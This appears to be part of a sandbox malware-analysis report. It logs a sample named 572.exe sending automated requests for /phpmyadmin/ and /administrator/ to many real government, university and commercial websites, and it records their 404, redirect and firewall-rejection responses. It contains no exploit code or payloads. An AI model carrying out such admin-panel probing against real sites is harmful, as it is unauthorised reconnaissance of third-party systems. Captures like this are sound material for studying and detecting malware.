2024-02-05 11:14:53 UTC | 1203 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=m1df5tcc91m83fp9jkoskfk3al; path=/
Set-Cookie: va_live_cookie_u=1; expires=Tue, 04-Feb-2025 11:14:53 GMT; path=/; domain=.virtuadopt.com; secure; HttpOnly
Set-Cookie: va_live_cookie_k=; expires=Tue, 04-Feb-2025 11:14:53 GMT; path=/; domain=.virtuadopt.com; secure; HttpOnly
Set-Cookie: va_live_cookie_sid=749f64b88f63aa65f0d1360333e5ca8d; expires=Tue, 04-Feb-2025 11:14:53 GMT; path=/; domain=.virtuadopt.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://virtuadopt.com/phpmyadmin
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WxHf79uuS2v%2FQSn9wQK7Eq4DZm8JywqNlILRdL%2FJm03l9bW1P6DW%2F8N23rV793kjTrFzCotEL4TCdcQr8hZn1fPSa7SDeT2%2FB8ZRh957lNEwq5kJMRmIyyRknA6%2BcqTu8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7a7bbf675d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.6 | 55276 | 170.114.52.2 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: gitam.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 1301 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-zm-trackingid: v=2.0;clid=aw1;rid=WEB_2f7cfeb0ef566b5f9fe64326c5eb5852
x-content-type-options: nosniff
content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-iHeF8ClCSkGydn8_YmnXmA' 'unsafe-inline' blob: https:;
x-frame-options: SAMEORIGIN
set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
x-zm-zoneid: VA
content-language: en-US
CF-Cache-Status: DYNAMIC
Set-Cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
Set-Cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.6 | 54867 | 164.100.128.15 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 178 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: upsconline.nic.in
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 252 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 954
Connection: close
Content-Type: text/html; charset=UTF-8
2024-02-05 11:14:53 UTC | 954 | IN | Data Ascii: <html><head><meta charset="utf-8"/><title>404 - this page does not exist</title><style type="text/css">body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;}.style1 {font-size: 18px}.style2 {font-size: 18px;font-


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.2.6 | 55874 | 31.13.88.35 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 193 | OUT | GET /phpmyadmin/?locale=es_LA&_rdr HTTP/1.1
Host: m.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:54 UTC | 786 | IN | HTTP/1.1 302 Found
Set-Cookie: datr=LcPAZePgUg-x6r8Z_KTACJCj; expires=Tue, 11-Mar-2025 11:14:53 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
Location: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fphpmyadmin%2F%3Flocale%3Des_LA&refsrc=deprecated&locale2=es_LA&_rdr
reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
2024-02-05 11:14:54 UTC | 2156 | IN | Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob:
2024-02-05 11:14:54 UTC | 812 | IN | Data Ascii: cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"Pragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 J


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.6 | 55248 | 54.85.194.183 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 197 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html
Content-Length: 7358
Connection: close
Server: nginx/1.12.2
Vary: Accept-Encoding
ETag: "5df8f9a3-1cbe"
2024-02-05 11:14:53 UTC | 7358 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.6 | 55518 | 138.66.39.205 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 184 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: login2.innova.puglia.it
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 249 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1409681332155852,0:1)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 194
Connection: close
2024-02-05 11:14:53 UTC | 194 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.6 | 55759 | 8.45.52.148 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 170 | OUT | GET /en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: genshin.mihoyo.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 669 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Date: Wed, 10 Jan 2024 20:53:40 GMT
                                                                                                                                                                                                                                                                                                                                                                Ali-Swift-Global-Savetime: 1704920020
                                                                                                                                                                                                                                                                                                                                                                Via: cache10.l2us2[0,0,304-0,H], cache17.l2us2[1,0], ens-cache13.us19[0,0,200-0,H], ens-cache15.us19[1,0]
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "f912-dq4rmbBoQ4BeSBaKE+RvH8X/c54"
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Age: 2211673
                                                                                                                                                                                                                                                                                                                                                                X-Cache: HIT TCP_MEM_HIT dirn:12:716686692
                                                                                                                                                                                                                                                                                                                                                                X-Swift-SaveTime: Sat, 03 Feb 2024 01:20:12 GMT
                                                                                                                                                                                                                                                                                                                                                                X-Swift-CacheTime: 588808
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                EagleId: 082d34a317071316934228487e
2024-02-05 11:14:53 UTC | 7002 | IN | Data Ascii: 1b52<!doctype html><html data-n-head-ssr data-n-head=""><head><title data-n-head="true">Genshin Impact Step Into a Vast Magical World of Adventure</title><meta data-n-head="true" charset="utf-8"><meta data-n-head="true" http-equiv="X-UA-Compatibl
2024-02-05 11:14:54 UTC | 16349 | IN | Data Ascii: sition:relative;width:100%;height:100%}.root .pv__video--modal iframe{width:100%;height:100%}.root .pv__video--close{position:absolute;right:-62px;top:10px;width:32px;height:32px;background:transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACA
2024-02-05 11:14:54 UTC | 16384 | IN | Data Ascii: 5db8us dcouvrirez le monde fantastique de Teyvat, et vos pas vous porteront travers sept pays la rencontre de voyageurs de tous horizons, qui vous accompagneront dans vos combats et votre qute. Explorez librement les diffrentes contres de
2024-02-05 11:14:54 UTC | 7616 | IN | Data Ascii: tfrom game; great mobile game; best mobile game; sandbox adventure RPG; multiple platforms; multiplayer mobile game; ARPG; crossplay; game cosplay; cosplay; new game 2020; best game 2020; isekai; cel shade; cel shaded; waifu; harem; genshin pre-register;
2024-02-05 11:14:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.6 | 55878 | 104.18.41.153 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 175 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 346 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7baea40701-ATL
2024-02-05 11:14:53 UTC | 168 | IN | Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
2024-02-05 11:14:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.6 | 54612 | 190.152.216.14 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: srienlinea.sri.gob.ec
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1805
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5_cspm=1234;;
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC246INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 52 65 71 75 65 73 74 20 52 65 6a 65 63 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 72 65 6a 65 63 74 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 75 6c 74 20 77 69 74 68 20 79 6f 75 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 62 72 3e 3c 62 72 3e 59 6f 75 72 20 73 75 70 70 6f 72 74 20 49 44 20 69 73 3a 20 32 31 38 37 34 30 37 33 39 34 39 36 39 34 36 39 32 33 31 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 27 3e 5b 47 6f 20 42 61 63 6b 5d 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 2187407394969469231<br><br><a href='javascript:history.back();'>[Go Back]</a></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC1559INData Raw: 3c 73 63 72 69 70 74 20 69 64 3d 22 66 35 5f 63 73 70 6d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 35 5f 63 73 70 6d 3d 7b 66 35 5f 70 3a 27 4f 4b 4d 47 47 4b 43 44 4b 48 43 4d 4c 46 44 41 48 4d 4e 4f 41 4b 4c 44 42 4d 4c 44 49 4c 45 4f 48 49 44 47 4f 41 50 4e 41 4d 4a 4f 4b 41 44 4b 43 4a 4a 43 4e 45 45 44 4e 4a 43 49 4c 4f 4f 42 50 41 4c 42 4b 42 46 46 41 41 4a 4c 50 4d 4d 4d 49 4d 4c 41 47 4d 50 49 41 41 41 4d 45 45 4b 48 47 42 4c 44 46 4c 45 42 4b 4f 50 45 4f 43 50 4f 45 49 4a 45 49 47 47 4e 4a 45 47 46 43 46 4f 47 27 2c 73 65 74 43 68 61 72 41 74 3a 66 75 6e 63 74 69 6f 6e 28 73 74 72 2c 69 6e 64 65 78 2c 63 68 72 29 7b 69 66 28 69 6e 64 65 78 3e 73 74 72 2e 6c 65 6e 67 74 68 2d 31 29 72 65 74 75 72 6e 20 73 74 72 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script id="f5_cspm">(function(){var f5_cspm={f5_p:'OKMGGKCDKHCMLFDAHMNOAKLDBMLDILEOHIDGOAPNAMJOKADKCJJCNEEDNJCILOOBPALBKBFFAAJLPMMMIMLAGMPIAAAMEEKHGBLDFLEBKOPEOCPOEIJEIGGNJEGFCFOG',setCharAt:function(str,index,chr){if(index>str.length-1)return str;return


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.6 | 55266 | 20.231.114.24 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: account.mojang.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 189 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.minecraft.net/
2024-02-05 11:14:53 UTC | 162 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.6 | 56111 | 54.85.194.183 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 185 | OUT | GET /administrator/ HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 197 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html
Content-Length: 7358
Connection: close
Server: nginx/1.12.2
Vary: Accept-Encoding
ETag: "5df8f9a3-1cbe"
2024-02-05 11:14:53 UTC | 7358 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.6 | 55083 | 177.74.1.157 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: sistemas.pa.gov.br
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:54 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-02-05 11:14:54 UTC | 196 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.6 | 54997 | 201.134.41.61 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
    Host: academico.um.edu.mx
    Accept: */*
    Accept-Encoding: deflate, gzip
    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 180 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 05 Feb 2024 11:14:53 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Content-Length: 282
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-02-05 11:14:53 UTC | 282 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 44


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.6 | 56456 | 184.25.164.103 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 172 | OUT | GET / HTTP/1.1
    Host: store.steampowered.com
    Accept: */*
    Accept-Encoding: deflate, gzip
    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 1812 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'none';
    X-Frame-Options: DENY
    Strict-Transport-Security: max-age=10368000
    Date: Mon, 05 Feb 2024 11:14:53 GMT
    Transfer-Encoding: chunked
    Connection: close
    Connection: Transfer-Encoding
    Set-Cookie: steamCountry=US%7C30188d811e243eaaab468117a5a3e458; Path=/; Secure; HttpOnly; SameSite=None
    Set-Cookie: browserid=3305147563454937137; Expires=Tue, 04 Feb 2025 11:14:53 GMT; Path=/; Secure; SameSite=None
    Set-Cookie: sessionid=78d17b7a9127d6e309fa93ff; Path=/; Secure; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.6 | 56115 | 142.250.105.84 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 183 | OUT | GET /administrator/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:14:53 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7eg543k_gazIu4iKbGkeKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:14:53 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:14:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.6 | 55273 | 164.100.213.210 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 171 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: ssc.nic.in
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:54 UTC | 932 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store,no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/
Server:
X-Content-Type-Options: nosniff
X-XSS-Protection: 1;mode=block
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src * data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net https://ajax.googleapis.com www.google-analytics.com www.googletagmanager.com; frame-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' 'unsafe-inline' 'unsafe-eval' www.google-analytics.com; font-src 'self' 'unsafe-inline' 'unsafe-eval';
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 05 Feb 2024 11:14:53 GMT
Connection: close
Content-Length: 176
2024-02-05 11:14:54 UTC | 176 | IN | Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/">here</a>.</h2></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.6 | 55838 | 31.13.65.1 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 182 | OUT | GET /administrator/ HTTP/1.1
Host: pl-pl.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 392 | IN | HTTP/1.1 302 Found
Location: https://m.facebook.com/administrator/?locale=pl_PL&_rdr
Strict-Transport-Security: max-age=15552000; preload
